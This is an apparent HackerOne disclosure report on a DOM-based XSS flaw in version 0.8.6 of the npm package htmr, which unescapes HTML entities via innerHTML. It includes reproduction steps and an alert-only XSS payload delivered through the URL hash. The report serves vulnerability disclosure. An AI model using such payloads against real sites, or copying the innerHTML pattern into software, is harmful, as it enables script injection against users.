Node.js third-party modules: [htmr] DOM-based XSS

ID H1:753971
Type hackerone
Reporter visat
Modified 2020-03-15T08:10:39



I would like to report DOM-based XSS in htmr. It allows attackers to insert malicious JavaScript payload into the page.


module name: htmr version: 0.8.6 npm page:

Module Description

Simple and lightweight (< 2kB) HTML string to react element conversion library

Module Stats

[6,877] weekly downloads


Vulnerability Description

This module uses innerHTML ref to unescape HTML entities. This leads to DOM-based XSS by inserting HTML-encoded XSS payload (see PoC).

Steps To Reproduce:

  1. Create a React app: create-react-app xss-htmr
  2. Install htmr module: cd xss-htmr; npm i htmr
  3. Edit src/App.js file to this:

``` import React from 'react'; import convert from 'htmr';

export default function App() { return convert(&lt;p&gt;Hash: ${window.location.hash}&lt;/p&gt;); } `` 4. Run the server:npm run start5. Visithttp://localhost:3000/#<img/src/onerror=alert('xss')>`, an alert will popup.


Supporting Material/References:

  • macOS Mojave 10.14.6
  • Node 12.13.1
  • NPM 6.12.1
  • Chrome 78.0.3904.108

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]

Thank you and regards, Visat


DOM-based XSS